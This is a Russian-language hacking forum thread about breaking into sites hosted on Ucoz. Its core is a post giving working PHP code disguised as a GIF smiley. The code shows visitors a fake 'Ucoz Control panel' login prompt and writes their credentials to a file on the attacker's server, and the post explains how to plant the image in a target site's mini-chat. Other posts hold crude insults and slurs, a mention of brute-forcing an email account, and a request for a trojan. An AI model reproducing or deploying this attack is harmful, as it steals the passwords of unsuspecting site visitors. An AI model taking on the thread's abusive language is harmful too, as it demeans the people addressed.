Хакер

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Хакер » Тестовый форум » Взлом сайтов на Ucoz !


Взлом сайтов на Ucoz !

Сообщений 1 страница 9 из 9

1

Предлогаем варианты !

0

2

от JI o x а хули ты знаешь? попросил как человека взломай сайт!!! И что вы думаете эта мразь по пробовала пару поролей из репертуара 12345 1234 1234567 1234567 а потом падонок запустил брутфорс для мыла и дал левый пасс 11223344 у ха ха сука нубяра, кострировать вас надо всех лохов тупых!!!

0

3

Пидоры хули вы молчите уебаны, хакерские моя бабушка и то пароли лучше вас подбирает сопляки тупы у ха ха ха МЕГО ХАКЕРЮГИ пососите хуй гомосеки даже пративно тут сидеть

0

4

Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).

Итак, начнем...
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:

<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

http://mysite.phphost.net/smile.gif

И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.

Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))

makarov - это гавналяп который тока пантуеться!!!!!!!!!!!!!!!!!!

0

5

браво... очень чисто

Отредактировано Лисенк@ (2009-08-21 16:10:21)

0

6

haker_klass
оч хороший способ , им даже можно вскрывать форумы php , но юкоз с 2007 года на такую фигню не идёт, и на новых сайтах юкоз [img] отключено , так что не везде катит))

P.S таких сайтов вообще сейчас уже нету, ну покрайней мере я не нашёл,так что ищете другой способ))

0

7

Помогите пожалуйста!!! Кто понял как надо делать, что написал haker_klass????????????Чё то я не понял, напишите скайп, майл!! Плиз очень прошу!!!!

0

8

Я не понял где нужно зарегистировать хост с поддержкой php?

0

9

нужен скрипт с трояном

Отредактировано Tobi-Slav (2010-08-27 08:37:00)

0


Вы здесь » Хакер » Тестовый форум » Взлом сайтов на Ucoz !